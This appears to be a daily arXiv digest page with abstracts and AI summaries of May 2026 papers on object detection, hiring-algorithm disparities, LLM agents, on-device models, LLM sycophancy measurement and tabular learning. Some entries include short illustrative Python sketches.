arXivDaily: arXiv daily academic digest, updated Monday through Friday
2605.25046 2026-05-27 cs.CV cs.AI Version update

TinyFormer: Preserving Tiny Objects in YOLO-DETR Hybrid Real-time Detectors

Jun-Wei Hsieh, Meng-Yu Kao, Ghufron Wahyu Kurniawan, Kuan-Chuan Peng

Affiliations: College of Artificial Intelligence, National Yang Ming Chiao Tung University; Mitsubishi Electric Research Laboratories

AI summary: Proposes TinyFormer, a hybrid detector that preserves shallow high-resolution features through a Parallel Bi-fusion Module (PBM) and uses a Spatial Semantic Adapter (SSA) to compensate for the spatial loss caused by coarse tokenization, improving small-object detection accuracy on MS COCO.

Abstract

YOLO-series and DETR-based detectors struggle with tiny-object detection. YOLO-style models benefit from efficient dense prediction, but their large-stride backbones may suppress tiny instances in deep feature maps and make grid assignment ambiguous. DETR-based models remove hand-crafted post-processing through set prediction, yet they reason over coarse token grids, where tiny objects occupy only a few weak tokens and are easily overlooked during matching. To address these limitations, we propose TinyFormer, a unified YOLO-DETR hybrid real-time detector that combines ViT representations, NMS-free set prediction, and a YOLO-style pyramid neck for accurate small-object detection. TinyFormer introduces a Parallel Bi-fusion Module (PBM), which builds high-resolution shortcuts from shallow stages to the feature pyramid, preserving fine spatial details during multi-scale fusion. We further design a Spatial Semantic Adapter (SSA) to compensate for the spatial loss caused by coarse tokenization. SSA extracts high-resolution cues from early stages and injects them into transformer token embeddings, improving tiny-object localization without sacrificing the global modeling ability of DETR. Experiments on MS COCO show that TinyFormer consistently outperforms recent YOLO-series detectors and the strong DEIMv2 baseline. TinyFormer-X achieves 58.4% AP even without PBM, while adding PBM improves the overall AP to 58.5% and brings a 1.6% AP gain on small objects. With Objects365 pre-training, TinyFormer-X-PBM reaches 60.2% AP, surpassing RF-DETR and other Objects365-pretrained detectors with fewer parameters and lower computation. These results demonstrate that TinyFormer bridges dense YOLO-style feature fusion and DETR-style set prediction, providing a strong accuracy-efficiency trade-off for real-time tiny-object detection. Code is available at https://github.com/mmpmmpmmpjosh/TinyFormer.

2605.27371 2026-05-27 cs.CY cs.AI Version update

Algorithmic Monocultures in Hiring

Rishi Bommasani, Sarah H. Bana, Kathleen A. Creel, Dan Jurafsky, Percy Liang

Affiliations: Stanford University; Chapman University; Northeastern University

AI summary: Studies how algorithmic monoculture in hiring leads to the same individuals and racial groups being rejected; an analysis of 4 million applications from 3 million applicants finds clear racial disparities and homogeneous outcomes.

Comments: Published at FAccT 2026. Website: https://algorithmichiring.github.io/

Abstract

Many employers screen job applicants with algorithms built by the same few algorithm vendors. We hypothesize that algorithmic monoculture leads to the same individuals and members of the same racial groups facing rejection. We acquire and analyze a novel dataset of 3 million applicants submitting 4 million applications where all the applications are screened by algorithms built by the same vendor. We find clear racial disparities in applicant outcomes. Of all applications submitted by Asian and Black applicants, 14.74% and 25.87% are submitted to positions that adversely impact Asian and Black applicants, respectively, according to U.S. employment discrimination standards. Individuals also receive homogeneous outcomes: 4% of all applicants who apply to 10 positions are recommended for rejection from all positions, a rate higher than expected by chance. To better understand this homogeneity, we leverage the deterministic replicability of hiring algorithms to generate the outcomes applicants would have received if they applied to all positions. We show that applicants would need to apply widely in order to ensure their applications are considered by a human.
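
The abstract does not say which test stands behind "U.S. employment discrimination standards". One common reading is the four-fifths rule from the EEOC Uniform Guidelines, under which a group whose selection rate falls below 80% of the highest group's rate is treated as adversely impacted. The sketch below assumes that reading; the function names and the counts are hypothetical and are not taken from the paper's dataset.

```python
def selection_rates(outcomes):
    """outcomes maps group -> (num_recommended, num_applied)."""
    return {g: rec / total for g, (rec, total) in outcomes.items()}


def adverse_impact(outcomes, threshold=0.8):
    """Return {group: impact ratio} for groups below `threshold` times the best rate."""
    rates = selection_rates(outcomes)
    best = max(rates.values())
    if best == 0:
        return {}  # nobody was recommended, so no ratio can be formed
    return {g: r / best for g, r in rates.items() if r / best < threshold}


# Illustrative counts for a single position (assumed, not from the paper).
position = {"A": (50, 100), "B": (30, 100), "C": (45, 100)}
flagged = adverse_impact(position)
print(flagged)
```

Here group B is flagged because its rate is 60% of group A's, while group C at 90% is not. Running such a check per position is one way the share of applications sent to adversely impacting positions could be tallied.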

2605.27366 2026-05-27 cs.AI cs.CL cs.LG cs.MA Version update

MUSE-Autoskill: Self-Evolving Agents via Skill Creation, Memory, Management, and Evaluation

Huawei Lin, Peng Li, Jie Song, Fuxin Jiang, Tieying Zhang

Affiliations: ByteDance Inc.; Rochester Institute of Technology

AI summary: Proposes the MUSE-Autoskill framework, in which LLM agents continuously improve their task-solving ability through a unified skill lifecycle (creation, memory, management, evaluation, and refinement); experiments indicate that lifecycle-managed skills can improve task success, efficiency, reuse, and cross-agent transfer.

Comments: 30 pages, 8 figures, 13 tables, work in progress

Abstract

Large language model (LLM) agents rely on reusable skills to solve complex tasks. However, existing skill creation approaches treat skills as isolated and static artifacts, limiting their reusability, reliability, and long-term improvement. We propose MUSE-Autoskill Agent (Memory-Utilizing Skill Evolution), a skill-centric agent framework that lets agents continuously improve their task-solving capability by creating, reusing, and refining skills under a unified lifecycle (creation, memory, management, evaluation, and refinement). Our framework enables agents to create skills on demand, store and reuse them across tasks, organize and select them efficiently, and evaluate them through unit tests and runtime feedback for continuous refinement. We further introduce skill-level memory that accumulates experience for each skill across tasks, enabling more effective reuse and adaptation over time. Experiments on SkillsBench provide initial evidence that lifecycle-managed skills can improve task success, efficiency, reuse, and cross-agent transfer, highlighting the importance of treating skills as long-lived, experience-aware, and testable assets.

2605.27361 2026-05-27 cs.AI cs.SY eess.SY Version update

Natural Language Query to Configuration for Retrieval Agents

Melissa Z. Pan, Negar Arabzadeh, Mathew Jacob, Fiodar Kazhamiaka, Esha Choukse, Matei Zaharia

Affiliations: UC Berkeley; University of Washington; Microsoft Azure Research - Systems

AI summary: Proposes BRANE, which uses an LLM to convert queries into workload characteristics and trains lightweight predictors to select the best configuration, advancing the cost-quality Pareto frontier on multiple benchmarks.

Abstract

Modern retrieval agents expose many configuration choices -- LLM, retriever, number of documents, number of hops, and synthesis strategy -- each shaping both answer quality and serving cost. Today, these pipelines are typically hand-tuned once per workload, leaving substantial per-query optimization untapped. We formulate the problem: given a natural-language query and either an accuracy or a budget target, select from a predefined pipeline catalog the configuration that minimizes cost or maximizes accuracy at inference time. We propose **BRANE**, which uses an LLM to convert each query into workload-specific characteristics, then trains a lightweight per-configuration predictor that estimates whether the pipeline will answer the query correctly. At inference time, **BRANE** selects the configuration that maximizes predicted correctness penalized by cost, exposing a tunable cost-quality tradeoff without retraining. Across MuSiQue, BrowseComp-Plus, and FinanceBench, **BRANE** consistently pushes the cost-quality Pareto frontier, matches the best fixed configuration's accuracy at up to 89% lower cost, and outperforms LLM-routing, rule-based, and fine-tuned Qwen3-4B baselines. These results show that per-query configuration of the full retrieval pipeline is a practical alternative to static workload-level tuning.
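
The inference-time rule in this abstract, choosing the configuration that "maximizes predicted correctness penalized by cost", can be read as an argmax over a score of the form p(correct) - lambda * cost. The sketch below assumes that linear penalty; the weight `lam`, the catalog entries, and the predictor outputs are all hypothetical, and the abstract does not specify the exact form BRANE uses.

```python
def select_config(predicted_correct, cost, lam):
    """Pick the configuration with the highest cost-penalized score.

    predicted_correct: config name -> predicted probability of a correct answer
    cost: config name -> serving cost (any consistent unit)
    lam: penalty weight; larger values favor cheaper configurations
    """
    return max(predicted_correct, key=lambda c: predicted_correct[c] - lam * cost[c])


# Hypothetical catalog and per-configuration predictor outputs for one query.
p = {"small-1hop": 0.62, "large-1hop": 0.80, "large-3hop": 0.88}
cost = {"small-1hop": 1.0, "large-1hop": 5.0, "large-3hop": 12.0}

accurate = select_config(p, cost, lam=0.0)   # ignores cost entirely
balanced = select_config(p, cost, lam=0.02)
cheap = select_config(p, cost, lam=0.05)
print(accurate, balanced, cheap)
```

Sweeping `lam` moves the choice along the cost-quality tradeoff without touching the predictors, which matches the abstract's point that the tradeoff is tunable without retraining.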

2605.27360 2026-05-27 cs.NI cs.AI Version update

GENESIS: Harnessing AI Agents for Autonomous 6G RAN Synthesis, Research, and Testing

Tamerlan Aghayev, Maxime Elkael, Michele Polese, Minh Dat Nguyen, Gabriele Gemmi, Andrea Lacava, Ali Saeizadeh, Reshma Prasad, Paolo Testolina, Angelo Feraudo, Soumendra Nanda, Pedram Johari, Salvatore D'Oro, Tommaso Melodia

Affiliations: Institute for Intelligent Networked Systems

AI summary: Proposes the GENESIS framework, which uses three composable primitives (agents, skills, and hooks) and a knowledge layer (SYNAPSE) to turn intents into solutions validated by over-the-air experiments, with the aim of accelerating 6G radio access network R&D.

Comments: 18 pages, 16 figures

Abstract

Cellular research and development (R&D) is throttled by six structural processes that each consume months of manual engineering work per iteration: (i) synthesizing new features from standards or research papers into production code; (ii) conformance and interoperability testing; (iii) hardening against field anomalies and diverse deployment environments; (iv) data-driven optimization of network functionalities; (v) discovering and prototyping novel waveforms, functionalities, and capabilities for future standards; and (vi) securing the stack against vulnerabilities. Although Large Language Models (LLMs) have compressed comparable R&D work in general software engineering from days to minutes, their known pitfalls worsen on Radio Access Network (RAN) use cases: they hallucinate Application Programming Interfaces (APIs) and mis-read specifications, which kills interoperability of RAN components at the first mistake, and they heavily rely on simulations for designing algorithms, which is notorious for breaking when transferred to real hardware. To address these challenges, we present GENESIS, an agentic Artificial Intelligence (AI) framework that converts intents (e.g., a specification clause, a telemetry anomaly, or a research hypothesis) into solutions validated with over-the-air experiments, fed back into a persistent knowledge base. GENESIS is built on three composable primitives (agents, skills, hooks) and a knowledge layer (SYNAPSE) that doubles as the source of ground truth and the recipient of every artifact the framework produces, making capabilities compound across runs.

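2605.27358 2026-05-27 cs.LG cs.AI cs.CL Version update

MobileMoE: Scaling On-Device Mixture of Experts

Yanbei Chen, Hanxian Huang, Ernie Chang, Jacob Szwejbka, Digant Desai, Zechun Liu, Vikas Chandra, Raghuraman Krishnamoorthi

Affiliations: Meta AI

AI summary: Targeting on-device deployment, proposes MobileMoE, a family of MoE language models with sub-billion active parameters; through jointly optimized architecture and four-stage training, it matches or exceeds leading dense and MoE models on 14 benchmarks and achieves efficient inference on smartphones.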

Abstract

Mixture-of-Experts (MoE) has become the de facto architecture for hundred-billion-parameter language models, yet its advantages at sub-billion scales for on-device deployment remain largely unexplored. To close this gap, we present MobileMoE, a family of on-device MoE language models with sub-billion active parameters (0.3-0.9B active and 1.3-5.3B total) that establish a new Pareto frontier for on-device LLMs. We first formulate an on-device MoE scaling law that jointly optimizes MoE architecture under mobile memory and compute constraints, identifying an on-device sweet spot - moderate sparsity with fine-grained and shared experts - that is simultaneously memory and compute-optimal. Building on the derived architectures, we train MobileMoE with a four-stage recipe covering pre-training, mid-training, instruction fine-tuning, and quantization-aware training, all on open-source datasets. Across 14 benchmarks, MobileMoE matches or exceeds leading on-device dense LLMs with 2-4$\times$ fewer inference FLOPs, and matches or surpasses the state-of-the-art MoE OLMoE-1B-7B with up to 60% fewer parameters. To bridge the last mile to mobile deployment, we provide the first efficient MoE inference on commodity smartphones with comprehensive on-device profiling. At comparable INT4 weight memory, MobileMoE-S delivers $1.8$-$3.8\times$ faster prefill and $2.2$-$3.4\times$ faster decode than the dense baseline MobileLLM-Pro.

2605.27354 2026-05-27 cs.LG cs.AI cs.CL Version update

Guiding LLM Post-training Data Engineering with Model Internals from Sparse Autoencoders

Yi Jing, Zao Dai, Jinwu Hu, Zijun Yao, Lei Hou, Juanzi Li, Xiaozhi Wang

Affiliations: Tsinghua University

AI summary: Proposes SAERL, a framework that uses sparse autoencoders to extract model internals and model data diversity, difficulty, and quality for reinforcement-learning data engineering, improving accuracy while reducing training steps.

Abstract

Model internals encode rich information about how a large language model (LLM) processes its training data; however, post-training data engineering largely relies on external signals and ignores rich intrinsic signals lying in model internals. We propose SAERL, a data engineering framework for LLM reinforcement learning (RL). It models three intrinsic data properties: diversity, difficulty, and quality, using model internals extracted with Sparse Autoencoder (SAE), an advanced mechanistic interpretability tool. Each property grounds a concrete data engineering operation: SAE-space clustering with moderate batch mixing for batch diversity control, a difficulty proxy for easy-to-hard curriculum ordering, and a quality probe for data filtering. SAERL improves average accuracy by 3.00% over vanilla GRPO and reaches target accuracy with 20% fewer training steps on Qwen2.5-Math-1.5B, with consistent gains across model scales and RL algorithms. Experiments show that SAE transfers effectively across model families and scales, serving as a lightweight and reusable data engineering tool. These results demonstrate that model internals are a powerful and practical source of signals for post-training data engineering.

2605.27338 2026-05-27 cs.AI cs.CC cs.CL cs.LO Version update

2-ASP(Q) programs with weak constraints: Complexity and efficient implementation

Andrea Cuteri, Giuseppe Mazzotta, Francesco Ricca

Affiliations: University of Calabria, Rende, Italy

AI summary: Studies the complexity of ASP(Q) programs with two quantifiers and weak constraints (2-ASP(Q)^w) and proposes CEGAR-based solving strategies implemented in the Casper system; experiments demonstrate their effectiveness.

Abstract

ASP(Q) extends Answer Set Programming (ASP) with Quantifiers over answer sets. In this paper we focus on the class of ASP(Q) programs with two quantifiers and weak constraints, denoted as 2-ASP(Q)^w. 2-ASP(Q)^w is a practically relevant fragment of ASP(Q) that is expressive enough to capture optimization problems up to the class Delta_3^P. On the theoretical side, we provide a complete complexity characterization of the main computational tasks for 2-ASP(Q)^w programs, including tight completeness results and the analysis of nontrivial cases that have not been addressed in previous works. On the practical side, we introduce novel strategies for computing (optimal) quantified answer sets in the Casper system, that rely on a Counterexample-Guided Abstraction Refinement (CEGAR) technique tailored to ASP(Q). An experimental evaluation on hard benchmarks from different application domains shows that the proposed techniques are effective in practice.

2605.27332 2026-05-27 cs.SE cs.AI cs.CV Version update

EdgeFlow: Edge-Map Augmented VLM-Based Flowchart Processing for Industrial Requirements Engineering

Zhifei Dou, Shabnam Hassani, Ou Wei

Affiliations: Huawei Research Canada

AI summary: Proposes EdgeFlow, which adds a Canny edge map to the vision language model (VLM) input as a structural prior, improving flowchart-to-Mermaid conversion accuracy without training data or fine-tuning; on an industrial dataset, node F1 improves by 17.39 percentage points and edge F1 by 16.94 percentage points.

Comments: 10 pages

Abstract

Flowcharts are widely used in industrial requirements, but usually remain embedded as static images. Vision Language Models (VLMs) show promise in converting these flowcharts into machine-readable models for requirements engineering (RE) activities; yet, when directly applied to flowchart conversion, they often fail on topology-critical visual details. To address this, we propose EdgeFlow, which augments a VLM's original input with a deterministically extracted Canny edge map, acting as a structural prior, to improve flowchart-to-Mermaid conversion without requiring annotated training data or domain-specific model fine-tuning. We evaluate EdgeFlow on IndusReqFlow, a dataset sourced from real-world requirements. Compared with off-the-shelf VLMs, EdgeFlow improves node-level F1 by 17.39 percentage points and edge-level F1 by 16.94 percentage points. At the path level, EdgeFlow improves path F1 by 11.06 percentage points, enabling better support for model-based testing. These results demonstrate that EdgeFlow provides a practical, training-free means to improve topology-preserving flowchart-to-Mermaid conversion for industrial RE. Cross-dataset evaluation results on a public synthetic benchmark show no significant improvement; this highlights the need for diverse benchmarks incorporating industrial data for the comprehensive evaluation of future VLM-based RE tools.

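2605.27331 2026-05-27 cs.AI Version update

Maat: The Agentic Legal Research Assistant for Competition Protection

Basant Mounir, Farida Madkour, Amira Abdelaziz, Asmaa Sami

Affiliations: Cairo, Egypt

AI summary: Proposes Maat, a legal research assistant built on the ReAct framework that combines RAG, web search, and user clarification; on case-specific competition-law tasks it significantly outperforms existing general-purpose and specialized legal assistants.

Comments: 5 pages, 1 figure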

Abstract

Competition law experts conducting legal research must review extensive volumes of cases, decisions, and judicial reports to identify precedents and assess key elements in competition and merger cases. Although general research assistants such as Claude and ChatGPT and legal assistants such as SaulLM-7B and LegalGPT are increasingly used to assist legal research, they remain inadequate for competition law analysis: they lack specialized domain expertise, provide insufficient official citations, or hallucinate competition law cases. We propose Maat, a ReAct agent that orchestrates tools corresponding to different tasks of the research process. Designed iteratively with competition law experts, Maat grounds cases and findings in official sources using RAG for reliability, provides rich in-line citations, falls back to web search when database coverage is insufficient, and prompts the user for clarification when queries are ambiguous. Maat significantly outperforms all baseline assistants on case-specific tasks and performs within range of the top baseline on theoretical question tasks. The dataset used is available on GitHub.

2605.27328 2026-05-27 cs.SE cs.AI cs.MA Version update

Governed Evolution of Agent Runtimes through Executable Operational Cognition

Mariano Garralda-Barrio

Affiliations: Independent Researcher

AI summary: Proposes a framework for governed runtime evolution of agent-generated artifacts in multi-agent systems through executable operational cognition, introducing HarnessMutation, a mechanism for lifecycle-aware runtime adaptation under validation, traceability, evaluation, and rollback constraints.

Comments: 14 pages, 4 figures, 1 table. Reference implementation and associated source code available at: https://github.com/mgarralda/governed-runtime

Abstract

Recent advances in agentic systems increasingly treat code as an executable operational substrate rather than as a disposable output artifact. Prior work such as "Code as Agent Harness" frames validated agent-generated artifacts as runtime entities that can be created, executed, revised, persisted, and reused within long-running cognitive loops. However, the governance, lifecycle management, and operational evolution of such artifacts remain under-specified. This paper proposes a framework for governed runtime evolution in multi-agent systems through executable operational cognition. We formalize agent-generated artifacts as persistent runtime capabilities that progressively become part of the operational substrate rather than transient intermediate outputs. Building on this perspective, we introduce HarnessMutation as a governed mechanism for lifecycle-aware runtime adaptation operating under explicit validation, traceability, evaluation, and rollback constraints. Rather than treating runtime adaptation as unrestricted self-modification, the proposed framework models evolution as a bounded and observable process over persistent operational memory. It further shows how these ideas can be operationalized over modern agent runtimes and governance-oriented orchestration systems, providing a conceptual foundation for adaptive infrastructures whose evolution remains explicit, auditable, and constrained.

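2605.27320 2026-05-27 cs.AI cs.CY econ.GN q-fin.EC Version update

Modeling Agentic Technical Debt and Stochastic Tax: A Standalone Framework for Measurement, Simulation, and Dashboarding

Muhammad Zia Hydari, Raja Iqbal, Narayan Ramasubbu

Affiliations: School of Business, University of Pittsburgh

AI summary: Proposes a formal and managerially usable framework that distinguishes Agentic Technical Debt (a stock of accumulated design and governance liability) from Stochastic Tax (a flow of operating burden that arises when stochastic agents are used), illustrated with an accounts-payable simulation and a spreadsheet.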

Abstract

Agentic AI systems combine probabilistic reasoning with delegated action through tools, context, memory, orchestration, and external workflow integration. This note develops a formal and managerially usable model that distinguishes Agentic Technical Debt from Stochastic Tax. Agentic Technical Debt is a stock of accumulated design and governance liability. Stochastic Tax is a recurring flow of operating burden that arises when stochastic agents are used in business workflows. The two constructs are related, but they are not the same: debt can amplify the tax, while the tax can remain positive even when debt is minimized. The note starts from a compact dashboard expression, expands it into a fuller structural model, defines all variables and parameters, shows how each cost category can be estimated from operational data, and illustrates the framework with an accounts-payable simulation and companion spreadsheet.

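2605.27299 2026-05-27 cs.CR cs.AI cs.HC cs.LG cs.SY eess.SY Version update

Risk Averse Alert Prioritization for IDS Using Subnormal Gaussian Fuzzy Models

Murat Moran

AI summary: Proposes an alert prioritization framework based on subnormal Gaussian fuzzy numbers that models three kinds of uncertainty (threat severity, detection confidence, and organizational risk attitude) and uses ranking indices to provide a tunable security posture; experiments show greater robustness than baselines under detector degradation.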

Abstract

Modern intrusion detection systems generate thousands of alerts daily, but alert fatigue severely limits security operations effectiveness due to too many false positives or low-impact events. We address this by proposing a principled framework for alert prioritization based on subnormal Gaussian fuzzy numbers, explicitly modeling three sources of uncertainty: threat severity, detection confidence, and organizational risk attitude. Each alert is represented as a fuzzy number with the core indicating severity, spread indicating uncertainty, and height reflecting detection reliability. We apply ranking indices to prioritize alerts, allowing organizations to tune security posture through a risk-attitude parameter. Experimental validation on CIC-IDS2017 and NSL-KDD demonstrates greater robustness than baselines under detector degradation (0.9963 vs 0.8215 NDCGrel@100), with distinct differentiation in mid-confidence alerts and near-parity with baselines under robust detectors. The framework is theoretically grounded, computationally efficient, provides interpretable reasoning, and remains robust across detector families and miscalibration scenarios.
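
The alert representation described in this abstract can be pictured as a Gaussian membership function scaled by a height below 1, which is what makes the fuzzy number subnormal. The sketch below shows that representation with core, spread, and height fields. The `rank_score` function is an illustrative assumption only: the abstract does not state which ranking indices the paper applies, and the class name, alert names, and values are hypothetical.

```python
import math
from dataclasses import dataclass


@dataclass
class FuzzyAlert:
    name: str
    core: float    # severity estimate (location of the peak)
    spread: float  # uncertainty about severity (Gaussian sigma)
    height: float  # detection reliability in (0, 1]; below 1 means subnormal

    def membership(self, x):
        """Gaussian membership scaled by height, so the peak equals height."""
        return self.height * math.exp(-((x - self.core) ** 2) / (2 * self.spread ** 2))


def rank_score(alert, risk_aversion):
    """Illustrative ranking index (an assumption, not the paper's index).

    risk_aversion > 0 counts uncertainty toward higher severity;
    risk_aversion < 0 discounts it.
    """
    return alert.height * (alert.core + risk_aversion * alert.spread)


alerts = [
    FuzzyAlert("port-scan", core=3.0, spread=0.5, height=0.9),
    FuzzyAlert("lateral-move", core=6.0, spread=3.0, height=0.5),
]
averse = sorted(alerts, key=lambda a: rank_score(a, 1.0), reverse=True)
seeking = sorted(alerts, key=lambda a: rank_score(a, -1.0), reverse=True)
print([a.name for a in averse], [a.name for a in seeking])
```

With these toy values, a risk-averse setting puts the uncertain, high-severity alert first, while a risk-seeking setting prefers the reliable, low-severity one. That is the kind of posture tuning the risk-attitude parameter is meant to expose.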

2605.27288 2026-05-27 cs.CL cs.AI cs.LG Version update

It's Not Always Sycophancy: Measuring LLM Conformity as a Function of Epistemic Uncertainty

Kevin H. Guo, Chao Yan, Avinash Baidya, Katherine Brown, Xiang Gao, Juming Xiong, Zhijun Yin, Bradley A. Malin

Affiliations: Vanderbilt University; Vanderbilt University Medical Center; Intuit AI Research

AI summary: Proposes the MUSE framework, which separates sycophantic conformity from uncertainty-driven conformity to explain why LLMs change their stance under user pushback, and finds that both kinds of conformity grow with the user's perceived expertise and the plausibility of the user's suggestions.

Abstract

Large language models (LLMs) are known to abandon their initial stance to conform to user pushback. While prior research largely attributes this behavior to sycophancy learned during reinforcement learning from human feedback, we hypothesize that conformity is also driven by a model's epistemic uncertainty at inference time. In this paper, we introduce MUSE, a two-stage evaluation framework to disentangle the mechanisms driving LLM conformity. Specifically, MUSE maps a model's epistemic uncertainty in responding to a query against its likelihood to yield to user pushback in a subsequent turn. We demonstrate that the mechanisms driving conformity extend beyond sycophancy alone. Specifically, we characterize two distinct factors that jointly drive conformity: sycophantic conformity, where a model aligns with user pushback even with absolute certainty in its initial response, and uncertainty-driven conformity, where a model's likelihood for conformity increases alongside its uncertainty. Furthermore, we conduct ablation studies to demonstrate that both sycophantic conformity and uncertainty-driven conformity grow with 1) the LLM's perceived expertise of the user and 2) the plausibility of the user's suggestions. More broadly, MUSE informs more targeted intervention strategies by distinguishing alignment-induced sycophancy and training-corpora-driven uncertainty.

2605.27268 2026-05-27 cs.CL cs.AI Version update

Lost in Sampling: Assessing Lexical Reachability in LLMs via the Word Coverage Score (WCS)

Samer Awad, Javier Conde, Carlos Arriaga, Tairan Fu, Javier Coronado-Blázquez, Pedro Reviriego

Affiliations: Information and Processing Telecommunications Center; Universidad Politécnica de Madrid; Politecnico di Milano; Banco de España

AI summary: Proposes the Word Coverage Score (WCS), a metric that quantifies how standard sampling filters (such as Top-p, Top-k, and Min-p) reduce the survival rate of low-frequency, high-information words, revealing the effect of decoding mechanics on linguistic diversity.

Comments: 15 pages, 6 figures

Abstract

Modern Large Language Models (LLMs) are often criticized for producing repetitive and homogeneous text, despite possessing vast latent vocabularies. While previous research has focused on model knowledge and training data, we investigate the role of decoding mechanics in suppressing linguistic diversity. We introduce the Word Coverage Score (WCS), a metric that quantifies the extent to which contextually appropriate human vocabulary is mathematically pruned by standard sampling filters (e.g., Top-$p$, Top-$k$, and Min-$p$). Rather than assessing static knowledge, the WCS measures the lexical survival rate of low-frequency, high-information human words as a function of sampling parameters. By auditing open-weight models on human-authored corpus fragments, we identify which logical lexical choices are rendered unreachable by the decoder, even when they reside within the probability space. Our results provide quantitative evidence that industry-standard sampling defaults act as unintended censorship mechanisms, smoothing the unique textures of human expression into a homogenized discourse. The WCS offers a rigorous framework for optimizing the trade-off between text coherence and lexical richness, providing a diagnostic tool for preserving the diversity of human language in generative models.
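
To make the pruning concrete, the sketch below implements the three filters named in this abstract and measures how often the word a human actually wrote survives them. The `coverage` function is a simplified stand-in for the WCS, whose exact definition the abstract does not give; the toy distributions and all function names are hypothetical.

```python
def top_k_keep(probs, k):
    """Tokens kept by Top-k: the k most probable tokens."""
    ranked = sorted(probs, key=probs.get, reverse=True)
    return set(ranked[:k])


def top_p_keep(probs, p):
    """Tokens kept by Top-p: shortest ranked prefix whose mass reaches p."""
    kept, mass = set(), 0.0
    for tok in sorted(probs, key=probs.get, reverse=True):
        kept.add(tok)
        mass += probs[tok]
        if mass >= p:
            break
    return kept


def min_p_keep(probs, min_p):
    """Tokens kept by Min-p: probability at least min_p times the top probability."""
    cutoff = min_p * max(probs.values())
    return {tok for tok, pr in probs.items() if pr >= cutoff}


def coverage(steps, keep_fn):
    """Fraction of human-chosen tokens that survive the filter.

    steps: list of (next-token distribution, token the human actually wrote).
    """
    hits = sum(1 for probs, human_tok in steps if human_tok in keep_fn(probs))
    return hits / len(steps)


# Toy distributions; real ones would come from a model's softmax output.
steps = [
    ({"the": 0.7, "a": 0.25, "yon": 0.05}, "the"),
    ({"walked": 0.7, "ran": 0.25, "ambled": 0.05}, "ambled"),
]
cov_top_p = coverage(steps, lambda pr: top_p_keep(pr, 0.9))
cov_top_k = coverage(steps, lambda pr: top_k_keep(pr, 3))
cov_min_p = coverage(steps, lambda pr: min_p_keep(pr, 0.1))
print(cov_top_p, cov_top_k, cov_min_p)
```

In this toy case the rare word "ambled" has nonzero probability but is cut by Top-p at 0.9 and by Min-p at 0.1, so it can never be sampled. That is the sense in which the abstract calls such words unreachable.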

2605.27254 2026-05-27 cs.LG cs.AI 版本更新

LUCoS: Latent Unsupervised Context Selection for Tabular Foundation Models

LUCoS: 表格基础模型的潜在无监督上下文选择

Oroel Ipas, Guillermo Gomez-Trenado, Rocío Romero-Zaliz, Isaac Triguero

发表机构 * Andalusian Research Institute in Data Science and Computational Intelligence (DaSCI)(安达卢西亚数据科学与计算智能研究所) Department of Computer Science and Artificial Intelligence (DECSAI)(计算机科学与人工智能系) Research Center in Information and Communication Technologies (CITIC)(信息与通信技术研究中心) Instituto de Investigación Biosanitaria Ibs.GRANADA, University of Granada, Granada, 18071, Spain(格拉纳达大学生物医学研究所)

AI总结 针对表格基础模型在低标签场景下的上下文选择问题,提出LUCoS方法,利用无监督先验拟合网络(PFN)的潜在几何结构选择代表性medoids作为上下文,在67个数据集上优于随机选择和原始空间方法。

Comments 18 pages, 4 figures, supplementary appendices included

详情
AI中文摘要

选择哪些实例进行标注是低标签表格学习中的一个关键挑战。对于最近的表格基础模型(如TabPFN),上下文选择直接决定预测性能。有监督的oracle实验表明,在相同标注预算下,精心选择的标注上下文集可以显著优于随机选择。然而,在TFM文献中,冷启动设置(即必须在任何标签可用之前选择实例)很少受到关注。这个问题本质上是几何问题。在视觉和语言领域,基础模型诱导出嵌入空间,其中简单的几何选择方法是有效的。相比之下,表格实例选择迄今为止主要是在原始表格空间中进行,而该空间缺乏自然的度量;异构类型、混合尺度以及非线性交互使得原始空间距离对于上下文构建不可靠,并且随着预算增加,原始空间选择在大多数数据集上表现低于随机。我们提出LUCoS(潜在无监督上下文选择),该方法用无监督先验拟合网络(PFN)诱导的潜在几何替换原始特征几何,并选择代表性medoids作为上下文。在67个OpenML-CC18数据集上,跨六个低标签预算评估,LUCoS在平均AUC、ACC和F1上排名第一,结论在指标和数据集级别的稳健性检查中保持稳定。增益分解揭示了一个简单机制:在最小预算下,主要收益来自强制覆盖;随着预算增加,决定性因素变为衡量覆盖的表示空间。LUCoS缓解了原始特征空间选择的失败,表明可靠的无监督上下文选择更少依赖于选择器的复杂性,而更多依赖于在有意义的表示几何中定义代表性。

英文摘要

Selecting which instances to label is a key challenge in low-label tabular learning. For recent Tabular Foundation Models such as TabPFN, context selection directly determines predictive performance. Supervised oracle experiments show that carefully chosen labeled context sets can strongly outperform random selection under the same labeling budget. However, the cold-start setting, where instances must be selected before any labels are available, has received little attention in the TFM literature. This problem is fundamentally geometric. In vision and language, foundation models induce embedding spaces where simple geometric selection methods are effective. In contrast, tabular instance selection has so far been performed predominantly in the original tabular space, which lacks a natural metric; heterogeneous types, mixed scales, and nonlinear interactions make raw-space distances unreliable for context construction, and original-space selection falls below random on the majority of datasets as the budget grows. We propose LUCoS (Latent Unsupervised Context Selection), which replaces raw-feature geometry with the latent geometry induced by embeddings from an unsupervised Prior-Fitted Network (PFN) and selects representative medoids as context. Evaluated on 67 OpenML-CC18 datasets across six low-label budgets, LUCoS ranks first under mean AUC, ACC, and F1, with conclusions stable across metrics and dataset-level robustness checks. A gain decomposition reveals a simple mechanism: at the smallest budgets, the main benefit comes from enforcing coverage; as the budget increases, the decisive factor becomes the representation space in which coverage is measured. LUCoS mitigates failures of original feature space selection, showing that reliable unsupervised context selection depends less on selector sophistication than on defining representativeness in a meaningful representation geometry.
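Selecting representative medoids in an embedding space can be sketched as follows. This is a plain k-medoids loop with farthest-point initialization, written under assumptions: the abstract does not specify the selection algorithm, and the 2-D points below stand in for PFN embeddings that a real pipeline would compute.

```python
import math


def k_medoids(points, k, iters=20):
    """Return sorted indices of k medoids (assumes distinct points)."""
    # Deterministic init: start at index 0, then add the farthest point each time.
    medoids = [0]
    while len(medoids) < k:
        far = max(
            range(len(points)),
            key=lambda i: min(math.dist(points[i], points[m]) for m in medoids),
        )
        medoids.append(far)
    for _ in range(iters):
        # Assign every point to its nearest medoid.
        clusters = {m: [] for m in medoids}
        for i, p in enumerate(points):
            nearest = min(medoids, key=lambda m: math.dist(p, points[m]))
            clusters[nearest].append(i)
        # New medoid = member with the smallest total distance to its cluster.
        new = [
            min(members, key=lambda c: sum(math.dist(points[c], points[j]) for j in members))
            for members in clusters.values()
        ]
        if sorted(new) == sorted(medoids):
            break
        medoids = new
    return sorted(medoids)


# Hypothetical latent embeddings forming two well-separated groups.
latent = [(0, 0), (0, 1), (1, 0), (10, 10), (10, 11), (11, 10)]
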